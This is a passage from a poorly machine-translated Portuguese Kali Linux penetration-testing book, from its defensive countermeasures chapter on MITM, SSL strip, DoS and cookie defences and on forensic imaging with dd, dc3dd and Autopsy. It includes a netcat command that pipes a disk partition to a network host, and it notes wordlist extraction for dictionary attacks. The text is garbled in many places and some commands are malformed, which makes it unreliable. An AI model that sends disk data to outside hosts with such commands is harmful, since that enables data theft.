listas de senhas populares. Voc pode usar estas listas para testar a fora da
suas senhas e polticas.
Espelhe o seu ambiente
Antes de testar um sistema contra uma configurao de segurana recomendada, a verificao de
vulnerabilidades, ou validao de um sistema vulnervel atravs da explorao, pode
fazer sentido para clonar o sistema para fins de teste, em vez de testar o real
sistema. As melhores prticas so replicar tudo, desde o hardware de hospedagem na web
aplicao a todo o contedo, porque pode existir vulnerabilidades em todas as camadas de
tecnologia.
Testando um ambiente clonado vai dar a liberdade Tester Penetrao para executar
qualquer grau de ataque, evitando impacto negativo s operaes. Embora a maioria
as pessoas no podem espelhar o ambiente exato, geralmente possvel a criao de um virtuais
ambiente com a mesma funcionalidade.
HTTrack
HTTrack um utilitrio de navegador offline livre. HTTrack permite que voc baixe um site
a partir da Internet para um diretrio local, construir todos os diretrios, captura de HTML, imagens,
e outros arquivos a partir do servidor e armazenar em seu computador. Voc pode navegar na
clonado
link do site-to-link, bem como test-lo em busca de vulnerabilidades. HHTrack extremamente
ferramenta simples para trabalhar com sites bsicos. No vai replicar o contedo dinmico, nem
ser que vai replicar site middleware, tais como bancos de dados. Por isso, pode no ser
apropriada em todos os ambientes de testes de penetrao.
[257]
Contramedidas defensivas
Para testar todos os aspectos de um site, voc ter que usar outro software para
clonar um alvo. Esse software deve incluir a captura de middleware e
contedo dinmico, bem como, possivelmente, exigir acesso de administrador
direitos sobre o alvo.
No momento da escrita, HTTack j no vem pr-instalado com Kali. Para instalar
HTTack, abrir um Terminal janela e tipo apt-get install httrack. Uma vez
a instalao estiver concluda, voc pode iniciar HTTrack, abra um Terminal e tipo httrack.
Voc ser solicitado a dar um nome de projeto, o caminho para instalar o site (o padro
root / sites /) E URLs para copiar. HTTrack d algumas opes para copiar o seu
alvo (s), conforme mostrado na tela a seguir. Algumas perguntas opcionais adicionais
est definindo wildcards e nvel recursivo. Ns selecionamos a opo 2. Depois de responder a
perguntas, selecione Yclonar o seu alvo (s).
HTTrack vai comear a clonar o seu alvo e todos os links associados. Pode demorar um pouco para
concludo, dependendo do tamanho do seu alvo. A prxima imagem mostra HTTrack
clonagem www.thesecurityblogger.com.
[258]
Captulo 7
Navegue at a pasta que voc especificou para salvar as metas clonados para iniciar o seu teste.
Outras ferramentas de
clonagem
Aqui esto mais algumas ferramentas de clonagem de sites disponveis na Kali Linux. Mais
uma vez,
essas ferramentas no ir replicar o contedo dinmico, nem iro replicar site
middleware, tais como bancos de dados. Portanto, eles no podem ser apropriados em todos
Ambientes de teste de penetrao.


WebCopier: uma ferramenta que clona um site para avaliao off-line, tais
como testes de penetrao.
w3mir: uma cpia HTTP para todos os fins e ferramenta de espelhamento. A
principal
foco de w3mir criar e manter uma cpia navegvel de um, ou
vrios, sites WWW remotas.
Man-in-the-middle defesa
Ataques man-in-the-middle so difceis de proteger contra. O ataque acontece fora
de ambiente controlado da vtima e, quando executado corretamente, no deixa um
assinatura bvio que alertar as vtimas envolvidas. MITM tipicamente o primeiro passo de
um ataque mais sinistra como tira SSL. Uma maneira comum de se proteger contra MITM
garantir sites usam SSL / TLS 3.0. Em outras palavras, certifique-se os sites so
acessada usando HTTPS ou conexes seguras HTTP. Verificando HTTPS no to fcil
como a procura de um pouco de barra de endereos verde com um smbolo de bloqueio, porque os
atacantes podem
servir certificados das vtimas para fazer parecer que a sesso segura.
[259]
Contramedidas defensivas
Para testar adequadamente uma sesso HTTP, examinar o certificado e olhar para o certificado
autoridade. Este esforo adicional desencoraja muitos usurios de verificar um seguro
sesso, o que torna este mtodo de ataque muito eficaz.
A figura anterior mostra um certificado SSL para o Gmail foi emitida pelo Google
Autoridade Internet. Isto soa muito bem, mas quem o Google Internet Autoridade?
Posso confiar neles? Ser que realmente o Google? Neste exemplo, eu tenho um outro certificado
autoridade apresentada por cima da Internet Autoridade Google chamado Equifax seguro
Autoridade de Certificao. Equifax tem uma srie de verificaes e balanos antes de emitir
certificado para garantir um negcio vlido. Verificando que Equifax gerou este
certificado que me faz sentir confiante de que posso confiar neste certificado.
Em ltima anlise, HTTPS depende do conceito de confiana. Para ser mais explcito, a questo
se resume a confiar na autoridade de certificao que emitiu o certificado vlido
e legtimo. Para ambientes de laboratrio, comum encontrar certificados auto-assinados
que os alarmes gatilho da maioria dos navegadores de Internet mais populares. Esse pop-up irritante
que
usurios se queixam ao acessar sites serve como um meio para avisar que a
autoridade de certificao no provvel confivel, e h o risco de um ataque MITM.
[260]
Captulo 7
Criptografado Virtual Private Network (VPN) uma outra forma de proteo contra
man-in-the-middle. Ao criptografar todos os dados enviados de e para o seu dispositivo
ao mascarar o seu endereo (IP) Internet Protocol, VPNs criptografadas garantir
que voc estiver em uma rede que no podem ser monitoradas ou gravadas por ningum, exceto
o fornecedor de VPN.
VPNs pode usar mtodos de autenticao forte, como a autenticao de dois fatores,
que inclui um nome de usurio e senha, juntamente com algumas outras formas de
autenticao, tal como OTP (De uma s vez senhas), tokens, ou certificados. Este
faz com que seja difcil para um atacante para roubar a autenticao necessria para
estabelecer
uma VPN usado por outro usurio.
VPNs tm a capacidade de utilizar mtodos de criptografia, tais como PPTP, L2TP, SSL e IPSEC.
SSL e IPSEC VPNs fornecer segurana de nvel superior para a guarda de dados em comparao
com
outros protocolos por causa de seu uso de protocolos de criptografia forte de criptografia.
VPNs so fornecidos por ambas as organizaes pblicas e privadas.
possvel que o provedor de VPN pode ser capaz de analisar o seu trfego,
porque eles so os prestadores de servios confiveis. Portanto, a questo
de confiana ainda um conceito muito importante quando se utiliza uma VPN. Voc
deve
perguntar se voc confia no seu provedor de VPN para proteger seus dados e
privacidade.
Sua segurana de dados est nas mos do prestador de servios.
Outras tcnicas que podem ser usadas para se defender contra os ataques MITM so Acesso mdia
Controle de Segurana (MACsec) e 802.1x. Estas abordagens usar redes avanadas
para fornecer autenticao de origem, integridade de dados e criptografia como viagens de trnsito
em toda a rede. Ambas as abordagens requerem compatibilidade com os equipamentos e deve ser
activada correctamente, de modo a ser eficaz.
Defesa tira SSL
Tira SSL (coberto de Captulo 3, os ataques lado do servidor, permite que atacantes para tirar ou
arrancar
a parte criptografada de um site e ver sesso de Internet da vtima, incluindo
informaes confidenciais. comum vincular tira SSL com outro ataque, como
como um man-in-the-middle, o que significa hackers ir capturar todo o trfego e despir SSL
criptografia de modo que tudo visvel para trfego sniffing ferramentas do hacker. Cobrimos
este conceito em Captulo 5, Atacar de autenticao, deste livro.
[261]
Contramedidas defensivas
Para se proteger contra ataques de strip SSL, importante entender como tira SSL
explora uma vtima. O ataque se aproveita de sites redirecionando os usurios a partir de um no-
verso do site criptografado, para uma verso criptografada do site. Quando voc navega
para http://www.facebook.com ou http://www.gmail.com, Voc vai notar que voc est
redirecionado para https://www.facebook.com e https://www.gmail.com. Tira SSL
quebra o redirecionamento e obriga a vtima a usar a verso no segura do
site. Alm disso, ainda mesmo que o site no tem uma verso no-seguro, mas tem
um redirecionamento, tira SSL ir interceptar a solicitao HTTP e encaminhar o usurio para HTTPS
site. Quando a vtima faz isso, o atacante poder ver toda sesso da vtima.
Um mtodo para se proteger contra ataques de strip SSL garantir que os sites no tm
uma verso no-seguro de si mesmo e que no implementar recursos de redirecionamento. Este
impediria um ataque sslstrip, porque no existe a possibilidade de redireccionamento. Quando um
vtima atacada, eles simplesmente no ser capaz de chegar a um website. Entendemos a partir de
um ponto de vista a implementao do mundo real que isso muito difcil de aplicar. As pessoas so
utilizado para a digitao de um pedido HTTP no-seguro e ser redirecionado automaticamente
quando
necessria segurana. Alm disso, muitas empresas no gostaria que os usurios a pensar o seu
site
est em baixo devido a no aceder a uma verso segura do site. Portanto, a melhor proteo
a partir de lminas SSL educar os usurios sobre como os ataques cibernticos ocorrer para que
possam identific-los.
Para alm disso, os mtodos de defesa esboamos anteriormente contra man-in-the-arbtrio meio
tambm defender contra ataques de strip SSL. A razo para isto tira SSL depende de um homem-
in-the-middle ataque ocorra.
Negao de Servio defesa
A maioria Distribudo ou padro Denial of Service (DDoS / DoS) ferramentas esto abertos
utilitrios de cdigo escrito em C # ou Java. Foi demonstrado em Captulo 6, ataques na Web,
como uma nica pessoa usando uma ferramenta de DoS podem ter um impacto devastador para
um negcio
limitando o acesso a fontes on-line ou derrubar um site. Ferramentas DDoS / DoS so
anunciado como aplicaes web ferramentas de testes de estresse. Embora eles poderiam
potencialmente
ser utilizado para que, em muitos casos, eles so utilizados para fins nefastos.
Ataques DDoS / DoS, na maioria dos casos requerem hardware infraestrutura de rede abusar.
Um dos mtodos mais comuns para se defender contra DDoS / DoS a configurao de rede
dispositivos que podem lidar com grande fluxo de pacotes, a capacidade de detectar anomalias
padres de comportamento e de trfego. Trfego malicioso identificado deve ser automaticamente
filtrou-se para evitar a interrupo do servio. Ferramentas de fornecedores, tais como balanceadores
de carga
e firewalls de aplicativos web, fazer um grande trabalho de deteco e defesa contra
volumtrica e ataques do tipo de aplicao. Ferramentas de segurana com capacidade de deteco
de DoS
so capazes de reconhecer rede, sesso e trfego da camada de aplicao, que importado
para mitigar riscos de DoS que pode existir em todas as camadas da pilha de protocolos.
[262]
Captulo 7
Para se defender contra os ataques contnuos e prolongados, muitas organizaes se voltam para a
Provedor de servios de aplicao DDoS. Um prestador de servio de aplicao DDoS trabalha com
seu ISP e as tentativas de parar de DDoS de chegar a sua rede, redirecionando o trfego
longe de sua organizao. Eles fazem isso por meio de protocolos de roteamento, como BGP
e tcnicas avanadas de DNS.
A maioria dos ataques de DDoS / DoS usar endereos IP falsos ou invlidos ao atacar
uma organizao. Os administradores de rede devem implementar Unicast Inverter caminho
Encaminhamento (Unicast RPF) em seus roteadores de borda voltados para a Internet como uma
proteo
mecanismo contra a falsificao de endereos de origem IP quando usado para lanar ataques
DDoS
ataques. Unicast RPF considerado melhores prticas para-virado de ponta da Internet
roteadores,
e um bom comeo para se defender contra DDoS / DoS. Unicast RPF est configurado no
nvel de interface em roteadores Cisco. Outra empresa fabrica pode ter semelhante
caractersticas em seus roteadores tambm. Quando Unicast RPF est configurado, no-
verificvel
ou endereos IP invlidos sero descartados.
Uma tcnica mais recente utilizada para identificar trfego DDoS / DoS est alavancando Netflow em
conjunto com as listas de acesso de trnsito a parar o trfego de entrada na rede como
bem como a identificao de ataques internos. Comportamento do trfego analisado e qualquer
indicao
que a rede de ver o trfego malicioso ir disparar alarmes, como Smurf ou
Pacotes Teardrop. Solues DDoS Leading / DoS oferecem a capacidade para monitorar
DDoS internos e externos / ameaas DoS.
Defesa de Cookies
Como discutimos em captulos anteriores, biscoito seqestro uma tcnica onde um atacante
rouba cookies de sesso. Biscoito seqestro pode ser derrotado se o seu site est funcionando
SSL / TLS 3.0. Muitos atacantes ir ignorar o SSL / TLS, usando uma combinao de man-
no entanto, ao assegurar a sua aplicao web s; in-the-middle ou ataques tira SSL
tem pginas seguras, ou seja, no fornecer um redirecionamento HTTP para HTTPS, ir atenuar
as formas de ataque.
Biscoito seqestro pode trabalhar atravs de conexes SSL / TLS, se os atacantes usam
cross-site scripting para enviar cookies para seus servidores. Os desenvolvedores podem
mitigar
esse risco, definindo o Proteger e HttpOnly Bandeiras na cookies.
Um erro comum sobre segurana de aplicaes web est assumindo desenvolvedores
garantir toda a sesso, em vez de apenas o portal de autenticao para uma web
aplicao. Quando toda a sesso no est protegido, um usurio pode, eventualmente, ser atacado.
Os desenvolvedores devem garantir toda a sua aplicao suporta web seguro e criptografado
sesses atravs de SSL / TLS 3.0 para evitar ser vulnervel a ataques.
[263]
Contramedidas defensivas
Defesa adicional contra bolinho seqestro est disponvel com populares Aplicao
Delivery Controller (ADC) aparelhos, como balanceadores de carga e filtros de contedo.
Vendedores populares a serem considerados so a Cisco, Bluecoat, Riverbed, Websense, e muitos
outros. Muitos desses vendedores mudar bandeiras de biscoito para Proteger e HttpOnly. Eles
tambm tm construdo em tcnicas de decoro para mitigar alguns ataques cross-site scripting.
Defesa Clickjacking
Clickjacking estava coberto de Captulo 5, Atacando de autenticao, e o
tcnica onde um atacante engana um usurio a clicar em algo que no seja
o que eles acreditam que esto clicando em. Uma das melhores maneiras de proteger contra
clickjacking , executando a extenso noscript para navegadores Firefox ou Chrome.
Isso vai evitar que cdigos no autorizados sejam executados no seu navegador web. Noscript
pode detectar os scripts no-autorizadas, alertar o usurio do script e impedir que o script
de execuo. Os usurios tm a capacidade de desativar os controles de script globalmente por
sesso ou por site.
Os autores deste livro so grandes fs de noscript, no entanto, voc deve incentivar
desenvolvedores web para configurar cabealho X-Frame-Options em respostas HTTP para
mitigar
este risco em aplicaes web. Alm disso, alguns controlador de entrega de aplicativos
aparelhos (ADCs), oferecem aos administradores a opo de escrever scripts personalizados que
tambm pode ajudar a reduzir esse risco.
Alguns sites podem ter razes legtimas para executar um script. Isso poderia
ser para carrinhos de compras ou outros sites de comrcio eletrnico.
[264]
Captulo 7
Forense digital
Kali Linux 1.0 inclui um nmero de ferramentas para lidar com requisitos forenses.
Forense a prtica de investigar provas e da verificao dos factos de interesse
que liga a um incidente. Esta seo lhe dar uma introduo para o digital
forense como ns acreditamos que necessrio ter um plano de reao quando um de seus
ativos, tais como um servidor web ou aplicativo, est comprometida. recomendado
pesquisar outras fontes para um treinamento mais completo como este tema se estende para alm
as ferramentas disponveis no Kali Linux. Forense digital uma rea de crescente interesse em
segurana da informao com muito poucas pessoas que conhecem bem.
importante lembrar-se de trs regras a qualquer hora que voc trabalha em forense digital.
O no cumprimento destas regras far opinies de vocs parecem amadoras,
e, provavelmente, tornar a sua investigao forense, inclusive.
A primeira regra nunca trabalhar sobre dados originais. Sempre use uma cpia. Certifique-se de no
fazer
modifique os dados quando voc cria uma cpia. No momento em que voc toca ou modificar dados
originais,
o caso torna-se intil. Evidncia adulterado nunca pode ser usado em qualquer jurdica
prosseguir, independentemente do que for encontrado. A razo uma vez um original modificado,
existe a possibilidade de identificao de provas falsas que podem deturpar a verdadeira
incidente. Um exemplo fazer uma mudana que ajusta a hora do sistema
registros. No haveria maneira de distinguir essa mudana de um amador analista de
erro ou um hacker tentando cobrir seus rastros.
A maioria dos cientistas forenses vai usar dispositivos especializados para copiar dados bit a bit. L
tambm um software muito respeitvel que vai fazer a mesma coisa. importante que o seu
processo ser muito bem documentado. A maioria das cpias digitais em processos judiciais que
foram expulsos foram removidos devido a um hash de um meio de armazenamento, como
um disco rgido, no combinando dados copiados. O hash de um disco rgido no ir corresponder a
um
contaminado cpia, mesmo que apenas um nico bit modificado. Uma partida de hash significa
que
extremamente provvel que os dados originais, incluindo logs de acesso do sistema de arquivos,
apagados disco de dados
informaes e metadados uma cpia exata da fonte de dados original.
A segunda regra para forense digital algo que pode armazenar dados deve ser
examinado. Em casos famosos envolvendo mdia digital, evidncia crtica tem sido
encontrado em uma cmera, gravadores DVR, consoles de videogame, celulares, iPods e outros
dispositivos digitais aleatrias. Se o dispositivo tem qualquer capacidade de armazenamento de
dados de utilizador, ento
possvel que o dispositivo pode ser utilizado em uma investigao forense. No descartar
um dispositivo de apenas porque improvvel. Um sistema de navegao do carro que armazena
mapas e
msica em cartes SD pode ser usado por criminosos para esconder os dados, assim fornecer provas
para o uso da Internet baseado em download de tags de msica.
[265]
Contramedidas defensivas
A ltima regra fundamental para forense digital garantir a documentar todas as suas descobertas.
Todas as provas e etapas utilizadas para chegar a uma concluso deve ser de fcil compreenso
para ele
para ser credvel. Mais importante ainda, os seus resultados devem ser recreatable. Independente
investigadores devem chegar mesma concluso que voc est usando a documentao
e tcnicas. Tambm importante que a documentao estabelece um cronograma
de eventos quando especificidades ocorreu e como ocorreu. Todos cronograma
concluses devem ser documentadas.
Uma investigao forense tudo sobre a percepo de ser um especialista em segurana
validando evidncias ligadas a um incidente. fcil ser pego procurando
bandidos e tirar concluses sobre o que pode ter acontecido com base na opinio.
Esta uma das maneiras mais rpidas para desacreditar seu trabalho. Como um especialista
forense, voc
s deve expor os fatos. Ser que a pessoa Alice roubar arquivos de Bob, ou fez a conta
que foi registrado como o nome de usurio Alice iniciar uma cpia da conta de usurio
Diretrio home do Bob para uma unidade USB com XXX nmero de srie no timestamp
XXX XXX em data? Veja a diferena? O verdadeiro vilo poderia ter roubado de Alice
as credenciais de login (usando mtodos abordados neste livro) e roubar dados de Bob enquanto
posando como Alice. O momento que voc saltar para uma concluso o momento em que seu
caso
torna-se inconclusivos base na interferncia pessoal. Lembre-se, como um forense
especialista, voc pode ser solicitado sob juramento para prestar depoimento sobre o que
exatamente
aconteceu. Quando qualquer coisa fora de fatos entra o registro, a sua credibilidade
ser interrogado.
Kali Forensics Bota
Kali Linux tem a opo de usar um Forensics de inicializao. Modo forense Kali selecionado
quando voc inicializar um sistema com um disco de boot-up Kali, como o CD ao vivo. Se voc
quiser
usar Kali como um kit de ferramentas de anlise forense, altamente recomendvel manter um Live
CD como Kali
parte do seu kit de ferramentas. O Kali Vivo CD pode ser obtido como uma imagem ISO baixado
no site da Kali Linux (consulte a Captulo 1, sobre a instalao de Kali). Quando botas Kali,
voc vai ver Modo Forensics como uma das opes seleccionveis.
[266]
Captulo 7
Usando Kali em Modo Forense ajuda voc a atingir o seu nmero de uma regra de ouro de no
modificar o sistema de arquivos de origem. O disco rgido interno no tocado e no
h a automontagem dos discos internos. Parties de swap e de qualquer outra memria ou cache
parties tambm no so utilizados em qualquer forma.
No modo forense, mdia removvel no ser montado automaticamente. Se um CD ou um polegar
unidade inserida no sistema, nada acontecer. possvel que voc pode querer
usar a mdia removvel no modo forense por mont-lo manualmente. Isto d
o especialista forense controle completo do sistema de arquivos e mdia que est sendo
montado no sistema.
Como dito anteriormente, voc deve sempre trabalhar em uma cpia da fonte de dados.
importante manter o sistema de arquivos da cpia intacta assim voc pode mostrar que voc no
fez
modific-lo, bem como de que seus passos podem ser recriados. Vejamos como usar as
ferramentas
disponvel em Kali copiar e dados de hash.
Anlise do Sistema de Arquivos com
Kali
ferramenta pode ser usada para fazer uma cpia exata de um sistema de arquivos, incluindo
excludos e bota
setores. Em muitos casos, o instrumento usado para criar um ficheiro de imagem de disco de
meios externos
ou discos rgidos. Quando dd cria uma imagem de disco, ele pode ser montado e examinadas
outros sistemas. dd pode salvar a imagem de disco em um compartilhamento de rede, se
necessrio ou um USB
dirigir to analistas forenses no toque no sistema de arquivos local. O prximo exemplo ser
examinar como usar dd para fazer uma cpia de um disco rgido interno. O primeiro passo
selecionar uma mquina de destino e arrancar com o Live CD do Kali no modo forense.
Vamos executar o comando sfdisk-l para exibir as informaes do disco no sistema
estamos realizando anlise.
dd uma das ferramentas Linux / Unix mais comuns usados para copiar sistemas de arquivos.
O
[267]
Contramedidas defensivas
A figura anterior mostra cinco parties. Divisrias 1, 2, e 5parecem
o mais interessante, uma vez partio 3e 4so listados como vazio. Lembre-se, troca
parties podem conter informaes que sobraram de atividades do usurio e cache. Se tivssemos
arrancado com o CD ao vivo em um sistema baseado no Windows, veramos uma partio diferente
estrutura, no entanto, o conceito global seria a mesma.
O prximo passo decidir qual partio para copiar. Vamos selecionar a primeira partio listados
na imagem anterior como / Dev/sda1.
O uso bsico do dd comando como segue:
dd if = <media/partition numa vazia> de = <image_file>
Para este exemplo, vamos digitar o seguinte comando para fazer uma cpia da primeira
partio:
dd if = / dev/sda1 of = sda1-image.dd
Isso ir criar um arquivo de imagem que uma cpia exata de nosso sda1 partio para o nosso local
sistema de arquivos. Espero que voc ver um grande problema com o que fizemos. Ns apenas
quebrou uma das
nossas regras de ouro de no modificar os dados originais, quando escreveu o arquivo para o nosso
sistema local, o que considerado como modificar os dados. A melhor prtica escrever o
arquivo de imagem para um outro sistema de arquivos, como uma partio diferente,
compartilhamento de rede, ou um
Drive USB. Preferncia pessoal do autor est usando um drive USB, no entanto, para este
exemplo, utilizando-se o sistema local aceitvel para fins de teste.
Para utilizar um drive USB para o armazenamento do sistema copiado, primeiro voc precisa ligar
um grande drive USB em seu sistema. Desde que voc est no modo forense na Vivo
CD, Kali no vai montar a unidade USB. Normalmente, voc quer deixar o sistema de arquivos
desmontado e deixar o dd ferramenta de lidar com as especificidades da unidade. Para fazer isso,
execute o
comando mostrado na imagem seguinte:
A localizao do dispositivo USB foi / Dev / null /; no entanto, voc pode escolher qualquer local.
Voc tambm pode salvar a imagem diretamente em um compartilhamento de rede NFS. Voc
pode fazer isso usando
o seguinte comando:
dd if = / dev/sda1 | porto nc my_ip_address_to_network_server opcional
No exemplo a seguir, estamos clonando a partio sda1 para nosso armazenamento NFS
servidor com um endereo IP de 10.0.0.5:
dd if = / dev/sda1 | nc 10.0.0.5
[268]
Captulo 7
Existem outras ferramentas que esto disponveis para clonar um sistema de arquivos. Recomenda-
se o
dd ferramenta para clonar parties especficas, porque construdo em Kali ea maioria dos outros
Sistemas Linux e Unix. O processo para clonar um sistema pode ser muito demorado,
dependendo de quo grande a partio que voc est tentando copiar. Embora dd
uma tima ferramenta, ele pode no ser sempre a melhor ferramenta. Se voc estiver olhando para
clonagem
um disco inteiro, existem outras ferramentas populares, como AIMAGE ou AIR Imager, que
no vem pr-carregado com Kali, mas so muito populares. importante confirmar
ferramentas utilizadas em uma investigao forense aderir a admissibilidade evidncias padro
regulamentos, se existe a possibilidade que a investigao ser usado em uma questo jurdica.
dc3dd
dc3dd o dd ferramenta com funcionalidades adicionais para anlise forense. dc3dd pode calcular
um
de hash entre a unidade que voc est copiando e da unidade de origem em um nvel pouco a
pouco.
Isso fundamental quando se pretende provar a cpia dos dados que voc est trabalhando
exatamente como o
inicial. Isto pode ser realizado atravs da criao de um hash de o original e a cpia
para verificar mais tarde uma partida.
Para o prximo exemplo, vamos executar o sfdisk-l comando para ver as unidades e
parties disponveis, como mostrado na imagem seguinte:
O dc3dd comando executado de uma forma semelhante como o dd ferramenta. Voc escolhe uma
fonte
unidade ou partio, bem como o destino para salvar a imagem. H tambm um hash
opo. No prximo exemplo, tomamos a partio de / Dev/sda2 e copi-lo para uma
arquivo de imagem chamado CopyofDrivedc3dd, juntamente com o clculo de um hash utilizando
sha256.
[269]
Contramedidas defensivas
Este exemplo para fins de demonstrao. Um verdadeiro forense
investigao no iria salvar a imagem de volta para a mesma unidade.
dc3dd lhe dar um cdigo hash exclusivo para o arquivo de entrada da unidade copiada quando
ela completa.
importante demonstrar a hash da cpia coincide exactamente com o original. Podemos
use o comando sha256sum para calcular o hash. Se calcularmos o hash em nosso arquivo
CopyofDrivedc3dd bem como a nossa unidade de disco rgido / Dev/sda2, Vamos ver que eles
correspondem. Ns
pode at mesmo ver a sada da nossa cpia dc3dd tambm o mesmo. Desde o hash corresponde,
temos confirmado os arquivos so exatamente os mesmos para uma investigao forense.
[270]
Captulo 7
Kali tem inmeras ferramentas forenses construdo em na categoria rotulada Forensics.
Aqui esto algumas ferramentas comumente usadas em Kali, quando aplicado a aplicaes web
forense:
Outras ferramentas forenses em Kali
chkrootkit
chkrootkit pode ser executado em sistemas Linux para determinar se rootkits existir no
sistema, com base em assinaturas e processos. Pense nisso como antivrus ou
antimalware para sistemas Linux.
Para executar o chkrootkit, abra um Terminal janela e tipo chkrootkit. Este ir verificar
o sistema operacional local para todos os rootkits instalados.
Chkrootkit um programa simples que pode garantir a sua cpia de Kali no foi
infectado. Voc tambm pode executar chkrootkit em outras distribuies Linux, instalando
que nesses sistemas.
Autpsia
Autpsia uma ferramenta forense digital de open source que roda em Windows, Linux, OS X,
e outros sistemas Unix. Autpsia pode ser utilizado para analisar imagens de disco e realizar
uma anlise em profundidade dos sistemas de arquivos, como NTFS, FAT, HFS +, Ext3, UFS, e
vrios
tipos de sistema o volume. O uso mais comum de autpsia como uma gesto de casos
ferramenta para o gerenciamento de anlise de arquivos de imagem. Lembre-se de como ns
criamos um arquivo de imagem
usando o dd ferramenta? Autpsia vai nos ajudar a investigar a imagem.
Para executar Autopsy, navegue at Kali Linux |Forensics |Digital Forensics e selecione
Autpsia. Isso far com que um Terminal janela, que ir iniciar a aplicao.
Deixe essa janela aberta e use a ferramenta por meio de sua interface web. Para acessar a web
interface, abra um navegador web e navegue at http://localhost:9000/autopsy.
[271]
Contramedidas defensivas
Selecionar Novo caso para criar um novo caso. Isto lhe dar o seguinte
imagem de exemplo:
Autpsia ir pedir a algumas perguntas antes de continuar. Perguntas incluem definio
o fuso horrio, entrando deslocamentos de tempo entre o seu sistema de Kali e do sistema
esto investigando, e descries, tais como nomes de host.
O prximo exemplo usaremos autpsia para examinar um arquivo de imagem que foi criada no
um exemplo anterior com a ferramenta dd, como mostrado na imagem seguinte:
[272]
Captulo 7
O primeiro passo carregar um Autpsia de imagem como mytestimage.dd.
Voc ter a opo de definir um valor de hash para o arquivo quando se utiliza o dd ferramenta.
Voc pode ter Autopsy calcular o valor hash. Os autores recomendam o clculo
seu prprio MD5 checksum. Isto pode ser feito usando o md5sum comando em um arquivo.
[273]
Contramedidas defensivas
Voc pode pegar o valor que calculado e coloc-lo diretamente na autpsia.
Autpsia uma plataforma que pode ajudar a coletar informaes forense para documentao
fins. Quando uma partio est pronta para ser examinada, voc pode usar Autpsia de olhar
no disco especfico, informaes, arquivos raw, e seus metadados do arquivo. Autpsia tambm pode
conectar-se ao Instituto Nacional de Padres de Software Biblioteca de Referncia para comparar
hashes de arquivos conhecidos para determinar se eles so bons ou maus programas.
Binwalk
Muitas vezes, difcil de determinar a finalidade de arquivos binrios identificados durante
uma investigao forense. A razo o cdigo-fonte para arquivos binrios normalmente
no disponvel. Binwalk uma ferramenta de anlise de firmware projetado para auxiliar na anlise,
extrao, e engenharia reversa de imagens de firmware e outros softwares binrio.
O foco Binwalk arquivos binrios de firmware, no entanto, existem atualizaes localizadas
para redes domsticas e de equipamentos sem fio, bem como outro consumidor
aparelhos eletrnicos.
Binwalk tem algumas opes diferentes que podem ser encontrados em: https://code.google.
com / p / binwalk / wiki / Uso. Voc pode executar o comando binwalk com o nome do arquivo
do arquivo binrio que voc gostaria de examinar. O prximo exemplo usa binwalk em um
firmware binrio para um roteador sem fio em casa, como mostrado na imagem seguinte:
Binwalk resultados sada do arquivo binrio:
[274]
Captulo 7
A figura anterior mostra o administrador baixado um arquivo binrio e
renomeou para fazer parecer que ele estava vindo de um fornecedor diferente (FW_WRT54G
um roteador Linksys). Binwalk foi capaz de analisar o arquivo e alerta que o arquivo um
Sercom firmware arquivo, mesmo que o arquivo foi renomeado para o formato Linksys.
pdf-parser
pdf-analisador usado para analisar e analisar Portable Document Format (PDF)
documentos, bem como extrato de informao em bruto, tais como cdigo, imagens, e outros
elementos de documentos PDF. uma ferramenta utilizada para analisar e desconstruir PDF
documentos que so identificados como possivelmente ter cdigo malicioso.
Principal
Acima de tudo um utilitrio de escultura de dados usado para recuperar arquivos com base em
seus cabealhos,
rodaps e estruturas de dados internas. Acima de tudo funciona com arquivos de imagem, tais como
os
gerado pela dd, Safeback, Encase, ou diretamente na unidade. Os cabealhos de arquivo de imagem
e
rodaps pode ser especificado por um arquivo de configurao ou usando linha de comando para
identificar arquivos
tipos. Estes tipos embutidos olhar para as estruturas de dados de um determinado formato de
arquivo, permitindo que
para uma recuperao mais confivel e mais rpido.
Pasco uma ferramenta forense para ler o index.dat arquivos que so criados pela Microsoft
Internet Explorer. O Internet Explorer index.dat arquivos armazenam navegador do usurio
histria, que pode ser til para uma investigao de um host. Microsoft armazena o
index.dat apresentar em vrios locais no disco rgido do sistema host. Por exemplo,
alguns index.dat arquivos esto em pasta pessoal do usurio usada para o perfil do usurio.
Pasco s funciona para o Internet Explorer. Outros navegadores como Firefox e
Chrome no deixe arquivos de index.dat.
Firefox e Chrome informaes navegador do armazenamento em bancos de dados SQLite.
O local da base de dados varia de sistema operacional para operao
sistema, mas eles podem ser abertos com qualquer visualizador SQLite. Um dos
ferramentas favoritas do autor para clientes SQLite um plugin do Firefox chamado
SQLite Manager.
Pasco
[275]
Contramedidas defensivas
Bisturi
Scalpel um utilitrio escultura arquivo que procura um banco de dados de cabealho do
arquivo conhecidos e
assinaturas de rodap, e as tentativas de esculpir arquivos uma imagem de disco. Isto feito
pela
configurar o scalpel.conf arquivo com o tipo (s) arquivo que voc gostaria de localizar
antes de lan-lo contra um banco de dados.
bulk_extractor pode extrair uma variedade de coisas a partir de uma imagem, incluindo carto de
crdito
nmeros, nmeros de telefone, URLs, e-mails. bulk_extractor tambm pode gerar
Wordlists a partir de uma imagem que pode ser usada em ataques de dicionrio. bulk_extractor
pode levar vrias horas para ser executado, mas os dados que extrado valeu a pena esperar
para uso em medicina forense.
bulk_extractor
Resumo
fundamental que a segurana considerada durante todo o ciclo de vida de todos os recursos
que so importantes para as operaes comerciais. Nossa meta para escrever este livro para alm
apoiar um verificador da penetrao educar leitores sobre vrios mtodos; malicioso
os usurios podem comprometer um recurso, para que os administradores podem melhorar a sua
segurana
defesas. Todo mundo um alvo, e cabe ao proprietrio de ativos para investir o bom
tempo e recursos para a reduo do risco de ser comprometida.
Este captulo serve como um meio para se defender contra ataques apresentados no anterior
captulos. Deve-se supor que as ferramentas utilizadas nos captulos anteriores pode ser
aproveitados para verificar vulnerabilidades em seus prprios sistemas. Os tpicos abordados
neste
captulo includo como clonar uma aplicao web para evitar sistemas ativos de teste,
padres de segurana da linha de base, e defesa contra tpicos de captulos anteriores.
Esses temas incluem senhas, ataques man-in-the-middle, striping SSL, DoS,
roubar cookies, e clickjacking. Este captulo tambm inclui uma seo dedicada
sobre o uso de Kali Linux para investigaes forenses.
O prximo captulo ir cobrir as melhores prticas para a entrega de Teste de Invaso
servios, incluindo mtodos para desenvolver as entregas dos clientes profissionais.
[276]
Ensaio de
Penetrao
Relatrio Executivo
Antes de comearmos, queremos destacar neste captulo toques sobre temas de
escrever relatrios, clusulas e acordos. Estes exemplos devem ser utilizados como general
diretrizes. De nenhuma maneira estamos advoga ter conhecimentos ou tcnicas que poderiam
ser aceito de forma legal. Apesar de sete dos nossos perfis do Facebook, sendo advogados,
